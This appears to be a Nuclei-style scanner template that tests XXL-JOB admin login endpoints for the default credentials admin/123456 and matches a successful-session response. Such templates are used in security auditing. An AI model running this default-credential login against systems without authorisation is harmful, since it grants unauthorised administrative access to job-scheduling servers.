id: xxljob-default-login

info:
  name: xxljob
  severity: high
  tags: xxl-job

requests:
  - raw:
      - |
        POST /xxl-job-admin/login HTTP/1.1
        Host:{{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        userName={{username}}&password={{password}}
      - |
        POST /login HTTP/1.1
        Host:{{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        userName={{username}}&password={{password}}
    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - 123456

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":200'
          - '"msg"'
          - '"content"'
        condition: and

      - type: word
        part: header
        words:
          - 'application/json'
          - 'XXL_JOB_LOGIN_IDENTITY'
        condition: and

      - type: status
        status:
          - 200
